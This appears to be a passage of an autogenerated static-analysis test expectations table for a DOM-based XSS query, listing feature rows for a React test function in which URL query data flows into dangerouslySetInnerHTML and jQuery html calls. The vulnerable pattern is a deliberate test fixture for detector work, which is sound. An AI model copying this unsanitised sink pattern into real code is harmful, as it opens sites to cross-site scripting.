createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:1 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:1 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | 'arguments' object of function react | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | 'arguments' object of function react | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | 'arguments' object of function react | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | 'arguments' object of function react | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | 'arguments' object of function react | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | exceptional return of function react | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | exceptional return of function react | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | exceptional return of function react | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | exceptional return of function react | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | exceptional return of function react | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | functio ... }/>);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | functio ... }/>);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | functio ... }/>);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | return of function react | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | return of function react | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | return of function react | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | return of function react | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:256:1 | return of function react | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:10:196:14 | react | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:10:196:14 | react | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:196:10:196:14 | react | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:15 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted ... .search | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted ... .search | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:9:197:42 | tainted ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:26 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:26 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:26 | document | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:26 | document | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:26 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:35 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:35 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:35 | document.location | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:35 | document.location | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:35 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:42 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:42 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:42 | documen ... .search | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:42 | documen ... .search | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:19:197:42 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:28:197:35 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:28:197:35 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:28:197:35 | location | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:28:197:35 | location | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:28:197:35 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:197:37:197:42 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:197:37:197:42 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:197:37:197:42 | search | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:197:37:197:42 | search | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:197:37:197:42 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:9 | React | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:9 | React | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:9 | React | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:9 | React | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:9 | React | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:23 | React.createElement | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:23 | React.createElement | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:23 | React.createElement | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:23 | React.createElement | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:23 | React.createElement | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | React.c ... nted}}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:199:5:199:76 | React.c ... nted}}) | contextSurroundingFunctionParameters | () | +| 